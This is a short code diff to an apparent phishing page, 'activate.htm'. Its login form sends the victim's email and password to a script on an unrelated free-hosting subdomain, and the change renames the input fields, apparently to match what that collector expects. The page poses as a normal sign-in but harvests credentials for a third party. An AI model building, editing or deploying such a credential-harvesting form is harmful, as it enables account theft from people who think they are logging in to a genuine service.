--- a/activate.htm
+++ b/activate.htm
@@ -820,7 +820,7 @@
   <form novalidate="" id="frmLogin" action="https://blueviolet-chimpanzee-178239.hostingersite.com/public.php" method="POST">
       <div class="input-group">
          <div class="input-wrapper ">
-            <input type="email" id="txtEmail" name="email" placeholder="example@email.com" required="" autocomplete="off" autofocus="autofocus" maxlength="254">
+            <input type="email" id="txtEmail" name="username" placeholder="example@email.com" required="" autocomplete="off" autofocus="autofocus" maxlength="254">
             <label for="txtEmail">Email</label>
             <span class="bar"></span>
          </div>
@@ -833,7 +833,7 @@
       </div>
       <div class="input-group">
          <div class="input-wrapper">
-            <input type="password" id="txtPass" name="password" required="" autocomplete="off">
+            <input type="password" id="txtPass" name="Password" required="" autocomplete="off">
             <label for="txtPass">Password</label>
             <span class="bar"></span>
             <span id="btnToggle" class="input-button icon_hidden"></span>
